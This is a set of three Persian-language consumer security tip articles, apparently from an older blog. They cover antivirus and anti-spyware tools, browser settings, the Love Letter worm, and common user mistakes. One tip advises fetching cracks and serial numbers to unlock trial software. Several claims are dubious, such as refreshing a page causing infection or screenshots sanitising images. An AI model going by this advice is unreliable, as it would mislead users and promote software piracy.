-
کامپیوتر خود را ضد ضربه کنید !
قصد داریم ۱۴ ترفند فوق العاده برای افزایش امنیت سیستم شما معرفی کنیم. ترفندهایی که با اطمینان میتوان گفت امنیت سیستم شما را تا ۸۰ درصد تضمین میکند و با عمل کردن به آنها میتوانید به طور تمام و کمال کامپیوتر خود را ضد ضربه کنید!
به دلیل این که هر روز ترفندهای جدیدی برای ویروسی کردن و هک کردن کاربران کامپیوترهای شخصی به وجود می آید این ترفند نگارنده شده است که باعث افزایش ۸۰ درصدی امنیت کامپیوتر شما می شود.
هر روزه شما هدف حمله ها و خطرهای بیشماری در اینترنت قرار می گیرید که از نظر تعداد می توان ۹۵ تا از هر صد حمله را متوقف کرد ولی همین ۵ خطر باعث کاهش امنیت به مقدار ۲۰% می شوند چون این خطرها توسط افراد عادی و تازه کار نیست و عاملان آنها در کار خود بسیار تبهر دارند ، در اکثر موارد می توانند از تمام مرزهای امنیتی بگذرند و به طور کامل به مقصود خود برسند .
استفاده از یک نرم افزار ضد هکر با آخرین به روز رسانی ها که من Black Ice را پیشنهاد می کنم چون نیازهای کاربران حرفه ای و تازه کار را به طور کامل برطرف می کند. البته Zone Alarm که از ورژن ۵ به بعد به ضد ویروس هم مجهز شده نیز انتخاب خوبیست ولی باید بدانید این نرم افزار نیاز به آموزش دارد {باید کتاب آموزشی آن که به تازگی منتشر شده را خریداری کنید} و بیشتر برای کاربران حرفه ای طراحی شده و کاربران تازه کار نمی توانند از آن به درستی استفاده کنند.
۲: استفاده از ویروس کشهای Norton Anti Virus 2005 و McAfee و Pandaکه اگر Pack کامل باشد خیلی بهتر است { پک کامل شاملAnti Virus ، Anti Spyware/Adware، Firewall ، Anti spam، Security Center، Privacy Service می باشد}
توجه داشته باشید که نرم افزارهای فوق را از سایتهای اصلی آنها بگیرید و اقدام به خرید آنها نکنید ، چون اکثر شرکتهایی که سی دی های آنتی ویروس را جمع آوری می کنند اصلا به این نکته توجه نمی کنند که این برنامه ها باید از سایت اصلی باشند و در بسیاری از موارد نسخه های کرک شده و گاها ویروسی را از سایتهای غیر قانونی یا به اصطلاح Warez می گیرند و این خود باعث می شود که برنامه قابلیت های خود را از دست بدهد . من پیشنهاد می کنم نسخه های نمایشی یا زمان دار این برنامه ها را دانلود کنید و سپس با دادن سریال نامبر آنها را رجیستر کنید . پک کامل مربوط به شرکت Symantec به نامNorton Internet Security و پک کامل McAfee با نام Internet Security Suite عرضه می شود.
۳: سطح ایمنی و ویروس کشی را در حالت High بگزارید تا تمام فایلها ، با هر پسوندی که هستند ویروس کشی شوند و توجه داشته باشید ویروس کش McAfee حالتی را با عنوان Heuristic دارد ، که به معنی اکتشافی است و در این حالت ویروس کش ، به طرز هوشمندانه ای اقدام به ویرس یابی می کند. توجه داشته باشید خیلی از ویروس هایی که در کامپیوتر شما پنهان شده اند به این روش آشکار می شوند . در حقیقت این نوع ویروس ها دو زیست هستند و مرتبا تغییر می کنند و از این رو ویروس کش ، در حالت عادی نمی تواند آنها را بیابد.
۴: Service Packهای ویندوز را دانلود کنید و همیشه ویندوز خود را به روز نگه دارید . البته با سرعت پایین اینترنت در ایران این کار عملا غیر ممکن است و به همین خاطر شما می توانید Service Pack 2 ویندوز را از طریق سی دی خریداری کنید.
۵: تنظیمات صحیح خود سیستم عامل و عدم به اشتراک گذاری فایلها. این تنظیمات عبارتند از غیر فعال کردن NetBios و سرویس Remote Assistance و بستن مسیر ورودی کرم MsBlaster که حفره آن همیشه ممکن است خطر ساز باشد. به علت حجم بالای مقاله روش انجام این کارها نوشته نشده است ولی در صورت نیاز درخواست بگذارید.
۶: عدم استفاده از برنامه های به اشتراک گذاری فایل از جمله Kazza که به علت نقص های بیشمار و همراه داشتن برنامه های جاسوسی استفاده از آن دیوانگی است.
۷: عدم استفاده از Internet Explorer . خیلی از برنامه های جاسوسی و Trojanها فقط در صورتی دانلود و در نتیجه فعال می شوند که صفحه مربوطه توسط Internet Explorer باز شود ، همچنین خیلی از کرمهای اینترنتی در صورت اجرا شدن و باز بودن اینترنت اکسپلورر گسترش پیدا می کنند . پیشنهاد می کنم از یک مرورگر دیگر به جای Internet Explorer استفاده کنید و قابلیت های PlugIn و Java Script آن را نیز غیر فعال کنید . در این میان مرورگر Opera و فایرفاکس از همه کارآمد تر می باشند .
۸: افزایش امنیت Internet Explorer . با همه این احوال موقعیتی پیش می آید که باید از مرورگر استاندارد اینترنت یعنی Internet Explorer استفاده کنید به همین خاطر روش های افزایش امنیت Internet Explorer را نیز بیان می کنم .
Cookie
Internet Explorer > Internet Option > Delete Cookie
Internet explorer > Internet Option > Delete Files
8.1: جلوی کوکی هایی که می توانند خطرناک باشند را بگیریم . برای این کار مراحل زیر را طی کنید و حالت Medium High را انتخاب کنید:
Internet Explorer > Internet Option > {tab} Privacy
8.2: استفاده از برنامه های ضد پاپ آپ . خیلی از PopUp ها باعث قفل شدن و در نتیجه بسته شدنIE می شوند و حتی می توانند حاوی کدهای مخرب و ویروس نیز باشند . بهترین برنامه هایی که برای این کار وجود دارد Zero PopUp و AdWare 6.0 است ، البته Adware بسیار بهتر عمل می کند و علاوه بر قابلیت ضد Pop up قابلیت Anti Spyware را نیز دارا می باشد .
۸٫۳: پاک کردن و غیر فعال کردن ذخیره سازی پسورد توسط IE . با توجه به ذخیره شدن پسورد ایمیل ها و یا وبلاگ شخصی شما در IE، از این رو می تواند مورد سو استفاده هکرها قرار گیرد . برای انجام این کار مراحل زیر را طی کنید:
Internet Explorer > Internet Option > {tab} Content > Auto Complete
و سپس دکمه Clear Password را می زنیم و بعد از آن تیک گزینه User Names & Passwords on Forms را بر می داریم .
صفحاتی که عکس یا عکسهای آنها نمایان نمی شود را Refresh نکنیم ، چون این یکی از روشهای آلوده سازی کامپیوتر قربانی به ویروس یا تروجان است و برای دیدن عکس مذکور روی آن کلیک راست بزنید و سپس گزینه Show Picture را بزنید . ممکن است سایتی حتی قسمتهای دیگرش نیز به درستی باز نشده باشد در این صورت نیزRefresh نکنید و آدرس آن سایت را در یک صفحه جدید IE وارد کنید .
۸٫۴: استفاده از برنامه های ضد برنامه های جاسوسی یا همان Anti Spyware و Anti AdWare که بهترین آنها Adware 6.0 و SpyHunter و SpySweeper می باشند و آنها را به ترتیب از سایتهای زیر می توانید دانلود کنید .
نکته ۱: برنامه AdWare تنها اشکالی که دارد این است که باید ابتدا یک فایل کوچک را دانلود کنید و بعد از اجرای آن به طور خودکار برنامه اصلی که حجم زیادتری دارد دانلود می شود و شما نمی توانید آن را با برنامه های افزایش دهنده سرعت دانلود کنید و همچنین برنامه اصلی را در اختیار نخواهید داشت تا بعد از تعویض ویندوز دوباره آن را نصب کنید و هر بار که ویندوز نصب می کنید باید آن را دوباره دانلود کنید .
نکته ۲: برنامه SpySweeper یک برنامه بسیار عالی است که به دائما در حال بررسی کوکی ها و دیگر برنامه های مخرب احتمالی است و به طور خودکار کوکی های خطرناک را پاک می کند . این برنامه دارای یک سکنر Spyware هم هست و مثل ویروس کش ها می تواند درایوهای هارد را بررسی کند ولی با این تفاوت که این برنامه به جای ویروس ، برنامه های جاسوسی را یافته و آنها را از بین می برد. تنها اشکال این برنامه آن است که برنامه Dap که برای دریافت تبلیغات و رجیستر شدن مرتبا به سایتش مراجعه و اطلاعات ارسال می کند را به عنوان برنامه جاسوسی می شناسد و آن را پاک می کند .
نکته ۳: برنامه SpyHunter بیشتر به درد کاربران حرفه ای تر می خورد و خود کاربر باید جلوی فایلهایی را که به اینترنت وصل می شوند را با شناخت کافی که دارد بگیرد . این برنامه خیلی کم حجم قابلیت کنترل Spyware ها و کد های مخربی که در خود سایت قرار دارند {به صورت فایل جداگانه {server} نیستند} و با آن Load می شوند را دارد و همه آنها را به طور خودکار Block می کند . همچنین با کمک این برنامه می توانید ارسال اطلاعات توسط هر تروجانی را متوقف کنید و حتی بهترین آنتی ویروس ها هم ممکن است که یک تروجان جدید را نشناسند و این برنامه از این نظر بهترین انتخاب است .
برای درک بهتر ادامه می دهم که این نرم افزار فایلهایی را که اطلاعات ارسال می کنند را monitor کرده و به طور پیش فرض در لیست سبز قرار می دهد و شما می توانید فایل مورد نظر را در لیست قرمز قرار دهید ، بدین ترتیب فایل مذکور بلوکه می شود . نکته جالبی که در اینجا نهفته است این است که می توانید فایل هایی نظیر Ie.exe یا dap.exe را در لیست قرمز قرار دهید تا امکان کار کردن با آنها میسر نباشد ، البته بهتر است این برنامه را همراه برنامه های فوق به کارگیرید .
۹: از چه سایتی برنامه Download می کنیم . ابتدا باید سایت مورد نظر را از آدرس فایلی که برای دانلود وجود دارد مورد بررسی قرار دهیم { مثلا www.tooto.com/spyhunter.zip را داریم و باید به سایت www.tooto.com برویم} و مطمئن شویم که برنامه مربوطه برای همین سایت است و هیچ وقت برنامه ها را از سایتهای ثالث نگیریم چون هیچ دلیل منطقی برای کار آنها وجود ندارد و بدون شک برنامه ای که ما از آنها می گیریم دارای ویروس یا تروجان است و این نکته باید بسیار مورد توجه شرکتهای رایت سی دی و سایتهایی باشد که برنامه برای دانلود معرفی می کنند . معمولا سایتهایی که برنامه های شرکتهای دیگر را برای دانلود می گذارند اسم های عجیب و غریب و طولانی دارند { این دو آدرس را مقایسه کنید : www.tooto.com/spyhunter.zip ، www.aktami.cu.ne/pub~/spyhunter.zip}
یکی دیگر از مشخصه های سایتهایی که برنامه هایی که برای دانلود گذاشته اند متعلق به خودشان نیست آن است که آنها لیست های طویلی از برنامه های مختلف دارند که همگی آنها از همان {سایت}Domain و بدون توضیح ، Preview و قسمت Help می باشند ، باید بدانید سایتی که برنامه خودش را برای دانلود گذاشته اولا تعداد محدودی برنامه دارد ، ثانیا برنامه را همراه Tutorial و Help و خیلی چیزهای دیگه معرفی می کند و آدرس مشخصی دارد ، همچنین در سایت اصلی برنامه عکسها و Screen Shot هایی همراه با توضیحات اضافه از برنامه مورد نظر وجود دارد .
سایتهایی که آدرس آنها بصورت IPاست بسیار خطرناکند و ممکن است Admin آن سایت با بدست آوردن IP شما که از طریق بازدید شما از آن سایت به دست او می رسد اقدام به هک کردن شما بکند یا همانطور که گفتم برنامه ای که در آن سایت برای دانلود قرار گرفته حاوی ویروس یا تروجان … باشد . نمونه یک سایت و فایل خطرناک که آدرس آنها به جای Domain آدرسIP می باشد: { IP حاوی چهار دسته عدد می باشد}
http://126.38.26.32.com/global.html, http://85.191.88.251.com/program.exe
حال ممکن است این سوال پیش بیاید که فلان برنامه دارای محدودیت زمانی یا عملکرد است و اگر ما آن برنامه را از این سایت اصلی دانلود کنیم چگونه می توانیم محدودیت آن را از بین ببریم و در جواب سوال شما باید بگویم که ابتدا نسخه Trial یا Demo برنامه را از سایت اصلی بگیرید و بعد از آن کرک آن برنامه را که حجم خیلی کمی هم دارد را از سایتهایی که برای این منظور می باشند دریافت کنید ، البته در موارد بسیار نادری اتفاق می افتد که کرک مربوطه حاوی ویروس است . ولی احتمال ویروسی شدن توسط آن خیلی کمتر از دریافت نسخه کامل کرک شده برنامه است و بهتر است از کرکهایی که شماره سریال در اختیار شما می گذارند استفاده کنید و کرکهایی که به جای فایل اصلی جایگزین می شوند خیلی مطمئن نیستند و حتی ممکن است از قابلیت برنامه بکاهند و برنامه انطور که می بایست کار نکند . خاطر نشان می کنم دریافت سریال برنامه هیچ خطری ندارد و مطمئن ترین راه کرک کردن نرم افزار است .
به سایت هایی که برنامه ها را کرک می کنند و آنها را برای دانلود می گذارند سایتهای Warez یا غیر قانونی می گویند . برای پیدا کردن سایت اصلی برنامه باید در گوگل به این صورت جستجو کنید :
Official Site + Name of Program
( در قسمت Name of Program باید نام برنامه مربوطه را بنویسید )
۱۰: همیشه به آی و پسوند عکسهایی که از طریق چت می گیرید توجه کنید و از طرف مقابل بخواهید که عکسش را به ایمیلتان بفرستد چون خود یاهو دارای Norton Anti Virus می باشد و فایل قبل از دانلود شدن Scan می شود و فقط در مواردی نادر ممکن است Yahoo ویروسی که همراه عکس هست را نشناسد به همین خاطر عکس مربوطه را پس از Download با ویروس کش McAfee نیز Scan کنید .
۱۱: از کار انداختن System Restore . همانطور که می دانید فایلهایی که پسوند های سیستمی مثلdll ، exe و غیره داشته باشند ، پس از پاک کردن یا اعمال تغییرات در System Restore ذخیره می شوند و این مسئله زمانی خطر ساز می شود که یک فایل ویروسی را به صورت دستی یا به کمک برنامه های ضد ویروس یا ضد Spyware پاک{Delete} یا تمیز{Clean} کرده اید ، ولی قافل از اینکه ویندوز این فایلها را در جایی دیگر حفظ کرده است و همچنان ویروس به فعالیت خود ادامه می دهد . برای از کار انداختنSystem Restore مراحل زیر را دنبال کنید:
Control Panel > System > {tab} System Restore > Turn off System Restore on All Drive
12: شاید زیاد اتفاق افتاده باشد که از طریق چت یا از یک سایت مشکوک عکس Download کرده باشید و نگرانید که این فایل حاوی تروجان یا ویروس مخصوص فایلهای JPG باشد و به همین خاطر عکس مربوطه را در کافی نت باز کنید و کلید F11 را بزنید و سپس کلید Print Screen را فشار دهید و بعد از آن برنامه Paint را باز کنید و Ctrl + V را بزنید و حالا می توانید عکس را با خیال راحت با هر پسوندی ذخیره کنید.
شاید بپرسید چرا برای این کار از برنامه های Picture Converter استفاده نکنیم و در جوابتان باید بگویم که ممکن است در فرایند تبدیل فایل ممکن است کدهای ویروس نیز ترجمه شده و همراه عکس Convert شده باقی بمانند ولی در روش فوق ، فرایند تهیه عکس هیچ نیازی به عکس مشکوک به ویروس ندارد .
۱۳: هرگز اسم کامپیوتر {Computer Name} خود را واقعی ندهید . هکرها می توانند اسم کامپیوتر شما و در نتیجه اسم شما را بیابند و برای جلوگیری از این کار یک اسم مستعار برای خود انتخاب کنید . همچنین از وارد کردن اسم و مشخصات واقعی خود در برنامه هایی مثلPhotoshop و غیره که در زمان نصب از شما اسم و مشخصات می خواهند نیز خودداری کنید .
۱۴: تبدیل متون به عکس برای امنیت بیشتر
روش اول: تبدیل متون از Word Pad به فایل تصویری توسط Paint
در این روش کافی است متن مورد نظر را که در برنامه Word Pad درج شده انتخاب کرده و کلیدهایCtrl + C را بزنیم و سپس برنامه Paint را باز کرده و کلید های CTRL + V را بزنیم . توجه داشته باشید هرچه طول متن بیشتر باشد Font ریزتر می شود.
نکته: اگر متن مورد نظر خیلی طولانی باشد ویندوز قادر به کپی کردن آن به Paint نیست و برای اینکه بتوانید متون بزرگ را به عکس تبدیل کنید باید در چند مرحله متن را کپی کرده و سپس در Paint بریزید و در نتیجه متن را به چندین فایل تصویری تبدیل کنید .
روش دوم: در این روش ابتدا Paint را باز کرده و سپس از ابزاری که به شکل A می باشد را انتخاب می کنیم و یک کادر باز می کنیم و در آن می توانیم متن را بنویسم یا اینکه متن کپی شده را Paste کنیم.
نکته : اگر کادر مربوط به تنظیمات متن باز نشد باید از منوی View گزینه Text toolbar را انتخاب کنید .
روش سوم: ابتدا کلید Print Screen که در بالای کلید های جهت نمای صفحه کلید است را می زنیم و سپس Paint را باز کرده و کلید های Ctrl + V را می زنیم و به این ترتیب متن مربوطه را به عکس تبدیل می کنیم.
نکته: برای کپی کردن عکسهایی که نمی توان آنها را مستقیما از طریق Internet Explorer به روش
Right click > save picture as
یکی از مزایای تبدیل متن به عکس این است که برای خواندن متن مورد نظر نیازی به داشتن ویندوز یا برنامه خاصی ندارید .
-
کرم های خطرناک رایانه
کرمها اصولاً ویروس نیستند با این وجود تفاوت بین آنها بسیار اندک است و معمولاً در اخبار روزمره آنها را با یکدیگر اشتباه می گیرند. ویروسها یک کامپیوتر منفرد را آلوده می کنند و سعی نمی کنند به کامپیوتر دیگری راه پیدا کنند اما کرمها بسیار شرور ترند چرا که سعی میکنند به کامپیوترهای دیگر انتقال پیدا کنند. ( مثلاً با اشتراک گذاشتن فایلها بوسیله email یا بوسیله فلاپی دیسک ها).
کرمها به شدت علاقه مندند که فقط خود را در میان یک شبکه گسترش دهند. آنها به طور خود کار خودشان را به کامپیوترهای دیگر انتقال می دهند به علت اینکه انتقال آنها بین کامپیوترها به طور خودکار انجام می پذیرد سرعت گسترش آنها بسیار سریعتر از ویروسها است. اما همیشه ما زرنگ تر بوده ایم. در این ترفند قصد داریم راه هایی را به شما معرفی کنیم که میتوانید از ورود کرم ها به سیستم تان جلوگیری کنید.
معمولترین راه گسترش یک کرم این است که خود را به همه آدرسهای email ای که شما در address book خود لیست کرده اید برساند ، یا outlook شرکت مایکروسافت برنامه email ای است که بیشترین آسیب پذیری را در برابر حمله کرمها دارد ، فقط به این دلیل که عمومی ترین برنامه است. برای کاهش دادن احتمال آلوده شدن به کرمها شما می توانید مراحل زیر را اجرا کنید:
هیچ فایل الصاقی ( attachment ) غیر منتظره ای را در email های خود باز نکنید ( بخصوص آنهایی را که شامل پیغامهای معمول مانند در این جا فایلی که شما درخواست کرده اید وجود دارد. ) هر چند آنها از منابع مطمئنی برای شما ارسال شده باشند. برای فرستنده email ای بفرستید (reply ) و از او سئوال کنید او واقعاً چنین فایلی برای شما فرستاده است یا نه؟
یک آنتی ویروس نصب کنید و آن را مرتباً up to date کنید.
اگر ممکن است از نرم افزار email ای به غیر از Outlook Express استفاده کنید.
اولین نمونه های کرمی که به خوبی منتشر شده “Love Letter” نام دارد که با فرستادن خود به آدرس email ای که در address book نرم افزار Outlook Express وجود دارند منتشر می شود به راحتی کپی کردن فایل در کامپیوتر قربانی خود را وارد می کند و با یک عنوان به صورت “I LOVE YOU” وارد می شود و پیغام آن به صورت زیر است :
“Rindly chek the attached LOVE LETTER coming from me”
بدلیل اینکه email از یک فرد شناخته شده برای گیرنده ارسال شده است بسیاری از مردم گول می خورند و کرم در حجم وسیع گسترش پیدا می کند. اگر چه به کامپیوتر قربانی آسیب وارد می شود ولی آسیب اصلی به کل شبکه وارد می شود و همه آن را آلوده می کند.
اسب تراوا چیز جالبی بنظر می رسد اما چیزهای آسیب رسان و کثیفی در بر دارد. و در لباس خدمات مفید یا پیوستهای ( attachments ) جذاب در email مثلاً یک screen saver پخش می شود. آنها فایلهی الصاقی برای شما می فرستند که آنقدر برای شما جالب است که آنها را برای دوستانتان می فرستید. در حالیکه آثار مخرب آن پنهان بوده با تأخیر عمل می کند بنابراین شما نمی دانید چیزی که در حال فرستادن آن هستید یک فایل خطرناک است.
در مواقع دیگر این کرمها تکثیر می شوند مانند یک کرم اینترنتی و خود را به صورت اتوماتیک به کامپیوترهای دیگر می رسانند و معمولاً از Outlook Express استفاده می کنند.
-
متداولترین اشتباهات کاربران در هنگام کار با رایانه
در این ترفند قصد داریم به معرفی متداول ترین اشتباهات کاربران در تمامی سطوح دانسته ها بپردازیم. بیشتر این اشتباهات به مسائل امنیتی مربوط میشود. نصب بی رویه نرم افزار خصوصأ نرم افزارهائی که از طریق اینترنت دریافت می گردد ، کلیک بر روی دکمه OK در یک جعبه محاوره ای که ممکن است باعث تغییر تنظیمات یک برنامه و در نهایت رفتار یک کامپیوتر و حتی در برخی موارد از کارافتادن سیستم گردد ، نمونه هائی اندک در این زمینه می باشند. پیشنهاد میکنیم این ترفند را حتما با دقت مطالعه بفرمایید چرا که ممکن است شما نیز این اشتباهات را مرتکب شوید و خودتان بی خبر باشید!
اتصال کامپیوتر به برق بدون استفاده از یک سیستم حفاظتی به منظور کنترل نوسانات جریان برق : عدم رعایت این موضوع می تواند باعث صدمه فیزیکی به کامپیوتر و از بین رفتن داده موجود بر روی آن گردد . برخی از کاربران این تصور را دارند که صرفا” پس از بروز یک شوک الکتریکی قوی احتمال بروز مشکل برای سیستم وجود خواهد داشت . ضمن رد این برداشت ، می بایست به این نکته اشاره گردد که هر چیزی که بتواند در سیگنال های الکتریکی وقفه ای را ایجاد و جریان برق را مجددا” از ابتدا آغاز نماید ، می تواند باعث سوزاندن قطعات کامپیوتر گردد . استفاده از برخی وسایل برقی ، خصوصا” دستگاه هائی نظیر سشوار و هیتر که به ولتاژ بالائی نیاز دارند ، می تواند باعث ایجاد نوسانات شدید گردد . پس از قطع جریان برق و اتصال مجدد آن نیز ممکن است تا رسیدن به یک سطح ولتاژ مطلوب ، زمانی بطول انجامد ( هر چند اندک ) و در همین فاصله ممکن است مشکلات خاصی برای برخی از دستگاه ها ایجاد گردد .
برای حفاظت سسیستم در مقابل خرابی ناشی از نوسانات شدید جریان برق ، می بایست از یک محافظ مناسب استفاده نمود . استفاده از ups ( برگرفته از Uninterruptible Power Supply ) در بسیاری از موارد نسبت به دستگاه های محافظ ترجیح داده شود ، چراکه این نوع دستگاه ها دارای امکانات مناسبی می باشند که می توان علیرغم قطع جریان برق همچنان از کامپیوتر استفاده و در صورت لزوم سیستم را بطور موفقیت آمیز خاموش نمود .
استفاده از اینترنت بدون فایروال : تعداد زیادی از کاربران ( خصوصا” کاربرانی که از طریق منزل به اینترنت متصل می شوند ) ، کامپیوتر خود را به مودم متصل و بلافاصله از اینترنت استفاده می نمایند ، بدون این که نسبت به این موضوع آگاهی داشته باشند که خود را در معرض چه تهدیداتی قرار داده اند . هر کامپیوتر متصل به اینترنت می بایست با بکارگیری فایروال ، حفاظت گردد . فایروال ، می تواند بخشی درون مودم / روتر و یا یک دستگاه جداگانه باشد که بین مودم /روتر و کامپیوتر قرار می گیرد و یا یک نرم افزار خاص باشد که بر روی کامپیوتر نصب می گردد (نظیر فایروال ارائه شده به همراه ویندوز XP ) . نصب یک فایروال به تنهائی کافی نبوده و می بایست پیکربندی آن را با رعایت مسائل امنیتی انجام داد .
قصور در اجراء و یا بهنگام سازی نرم افزارهای آنتی ویروس و آنتی spyware : بدون شک ، برنامه های آنتی ویروس دارای یک نقش اساسی به منظور ایمن سازی یک کامپیوتر می باشند . به دنبال نصب اینگونه نرم افزارها ممکن است کاربران با مشکلات خاصی در خصوص اجرای برخی برنامه های کامپیوتری مواجه و یا به منظور نگهداری و بهنگام سازی آنان هزینه های خاصی را متقبل شوند ، ولی مسائل فوق نمی تواند دلایل قانع کننده و منطقی به منظور عدم نصب و بهنگام سازی یک نرم افزار آنتی ویروس بر روی سیستم باشد . برنامه های مخرب که نرم افزارهای آنتی ویروس آنان را به عنوان ویروس ، تروجان و یا کرم ها تشخیص خواهند داد ، علاوه بر این که ممکن است مشکلات خاصی را برای یک سیستم ایجاد نمایند ، می تواند یک شبکه کامپیوتری را نیر با مشکلات عدیده ای مواجه نموده و حتی باعث از کارافتادن سرویس های شبکه گردند .
spyware ، نوع دیگری از تهدیدات فزاینده در عصر حاضر می باشند که بر روی کامپیوتر کاربران و بدون آگاهی آنان نصب و اقدام به جمع آوری اطلاعات و ارسال آنان به یک مکان دیگر می نمایند . برنامه های آنتی ویروس ، اغلب قادر به تشخیص و برخورد مناسب با این نوع برنامه های مخرب نمی باشند ، بنابراین می بایست از یک نرم افزار اختصاصی تشخیص spyware استفاده گردد .
نصب و uninstall برنامه های مختلف خصوصا” نسخه های beta : تعداد زیادی از کاربران کامپیوتر تمایل دارند که از آخرین فن آوری ها و نرم افزارهای موجود استفاده نمایند . این گروه از کاربران، همواره اقدام به نصب نسخه های جدید نرم افزارها بر روی سیستم خود می نمایند . نسخه های beta معمولا” رایگان می باشند و این فرصت را در اختیار کاربران علاقه مند قرار می دهند که قبل از ارائه نسخه نهائی که اکثر کاربران با آن کار خواهند کرد ، با ویژگی ها و پتانسیل های آن آشنا شوند . همچنین ، امروزه می توان نرم افزارهای shareware و freeware متعددی را در اینترنت یافت که کاربران علاقه مند و کنجکاو را ترغیب به دریافت و نصب آنان بر روی سیستم بدون توجه به مسائل امنیتی می نماید .
به موازات افزایش تعداد نرم افزارهای نصب شده و یا متعاقب آن uninstall کردن آنها ، احتمال بروز مشکلات متعددی برای کاربران وجود خواهد داشت . حتی در صورتی که نرم افزارهای اشاره شده قانونی باشند ، با نصب و uninstall آنها ، ممکن است برای ریجستری مشکل ایجاد گردد چراکه تمامی برنامه های uninstall قادر به حذف تمامی تنظمیات انجام شده در ریجستری نمی باشند. مشکل فوق ، در نهایت کند شدن سیستم را به دنبال خواهد داشت .
پیشنهاد می گردد ، صرفا” برنامه هائی را که ضرورت استفاده واقعی از آنان احساس و از عملکرد آنان اطمینان حاصل شده است را بر روی سیستم نصب نمود. همچنین ، می بایست تعداد دفعات نصب و uninstall نرم افزار را به حداقل مقدار ممکن رساند .
پرکردن فضای ذخیره سازی هارد دیسک و تقسیم آن به بخش های مختلف (fragmentation) : یکی از نتایج نصب و uninstall کردن برنامه ها و یا اضافه و حذف داده ، fragmentation دیسک است . علت بروز مشکل فوق به ماهیت و روش ذخیره اطلاعات برمی گردد . در یک دیسک جدید ، از بخش های پیوسته و پشت سرهم ( موسوم به کلاستر ) در زمان ذخیره یک فایل استفاده می گردد . در صورتی که اقدام به حذف فایلی گردد که پنج کلاستر را اشغال کرده است و در ادامه فایل جدیدی را ایجاد نمائیم که به هشت کلاستر جهت ذخیره شدن نیاز داشته باشد ، پنج کلاستر اولیه به آن اختصاص داده شده و سه کلاستر دیگر از بخش دیگری بر روی دیسک به آن اختصاص داده می شود . بدین ترتیب ، اطلاعات موجود در فایل در دو مکان متفاوت ذخیره می گردند . در ادامه و به منظور دستیابی به فایل ، هدهای هارد دیسک می بایست با قرار گرفتن در مکان های مختلف اقدام به بازیابی اطلاعات یک فایل نمایند . بدین ترتیب ، سرعت دستیابی به فایل کاهش و در صورتی که فایل اشاره شده مربوط به یک برنامه باشد ، سرعت آن برنامه نیز کاهش خواهد یافت .
برای استفاده از برنامه disk defragmenter در ویندوز می توان از مسیر Programs | Accessories | System Tools برنامه را فعال و یا از سایر برنامه های موجود استفاده نمود . برنامه های فوق با سازماندهی مجدد فایل ها ، آنها را حتی المقدور در مکان های پشت سرهم قرار خواهند داد . بدین تریتب ، سرعت دستیابی به اطلاعات ذخیره شده بر روی هارد دیسک افزایش خواهد یافت .
باز کردن تمامی ضمائم همراه نامه های الکترونکیی : فایل های ضمیمه ارسالی همراه یک email می تواند مشکلات امنیتی متعددی را برای کاربران ایجاد نماید. حذف اطلاعات موجود بر روی سیستم و یا ارسال ویروس برای افرادی که آدرس آنان در لیست تماس می باشد از جمله مشکلات فوق می باشد . متداولترین فایل های ضمیمه خطرناک ، فایل هائی اجرائی (فایل هائی که توان اجرای کد را دارند) با انشعاب exe . و یا cmd . می باشند . فایل هائی که خود توان اجرای مستقیم را ندارند نظیر فایل های doc . برنامه word و یا فایل های xls . برنامه اکسل ، نیز می توانند حاوی کدهای مخرب باشند . اسکریپت ها ( Vbscript ,javaScript و فلش ) نیز مستقیما” اجراء نمی شوند ولی می توانند توسط سایر برنامه ها اجراء شوند .
برخی از کاربران این تصور را دارند که فایل های متن با انشعاب txt . و یا فایل های گرافیکی (gif, .jpg, .bmp .) ایمن می باشند ولی همواره اینچنین نخواهد بود . انشعاب یک فایل می تواند جعل شود و مهاجمان از تنظیمات پیش فرض ویندوز که انشعاب فایل های متداول را نمایش نمی دهد ، سوء استفاده نمایند . به عنوان نمونه ، فایل greatfile.jpg.exe که انشعاب واقعی آن مخفی است به صورت greatfile.jpg نمایش داده خواهد شد و کاربران فکر می کنند که فایل فوق یک فایل گرافیکی است ولی در واقع یک برنامه مخرب است .
کاربران کامپیوتر می بایست صرفا” در مواردی که انتظار دریافت یک email به همراه ضمیمه مورد نظر را از یک منبع تائید شده و در آن زمان خاص دارند ، اقدام به بازنمودن فایل های ضمیمه نمایند . حتی در صورتی که یک نامه الکترونیکی به همراه فایل ضمیمه ای را دریافت می نمائید که نسبت به هویت ارسال کننده آن هیچگونه تردیدی وجود ندارد ، این احتمال وجود خواهد داشت که آدرس فوق توسط مهاجمان جعل و یا توسط کامپیوتری آلوده به ویروس و بدون اطلاع صاحب آن ارسال شده باشد .
کلیک بر روی هر چیز : باز نمودن فایل های ضمیمه تنها نوع کلیک بر روی موس نمی باشد که می تواند مشکلات امنیتی متعددی را برای کاربران ایجاد نماید . کلیک بر روی لینک موجود در یک نامه الکترونیکی و یا صفحه وب نیز می تواند کاربران را به سمت یک وب سایت مخرب هدایت نماید . در این نوع سایت ها ، احتمال انجام هرگونه عملیات مخربی وجود خواهد داشت . پاک کردن هارد دیسک ، نصب یک backdoor که به مهاجمان این امکان را خواهد داد تا کنترل یک سیستم را بدست بگیرند ، نمونه هائی در این زمینه می باشد .
کلیک بر روی لینک های نامناسب ، می تواند کاربران را به سمت یک وب سایت نامناسب نظیر سایت های پرونوگرافی ، موزیک ها و یا نرم افزارهای سرقت شده و سایر محتویاتی که ممکن است برای کاربران مشکلاتی را به دنبال داشته باشد ، هدایت نماید . قبل از کلیک بر روی یک لینک ، می بایست نسبت به عواقب آن فکر کرد و هرگز جذب پیام های اغواکننده نگردید .
اشتراک فایل ها و اطلاعات : شاید به اشتراک گذاشتن برخی چیزها در زندگی روزمره امری مطلوب باشد ( نظیر اشتراک دانش ) ولی در زمان حضور در یک شبکه با کاربران گمنام و بیشمار ، اشتراک فایل ها و … می تواند تهدیدات امنیتی خاص خود را برای کاربران به دنبال داشته باشد . در صورتی که امکان اشتراک فایل و چاپگر فعال است ، سایر کاربران می توانند از راه دور به سیستم متصل و به داده موجود بر روی آن دستیابی داشته باشند . حتی المقدور می بایست گزینه file and printer sharing غیرفعال گردد و در صورتی که لازم است برخی فولدرها به اشتراک گذاشته شوند ، می بایست از آنان در دو سطح متفاوت حفاظت نمود : مجوزهای share-level و مجوزهای file-level ( مجوزهای مبتنی بر NTFS ) . در چنین مواردی می بایست از استحکام رمزهای عبور در نظر گرفته شده برای local account و local administrator نیز اطمینان حاصل نمود .
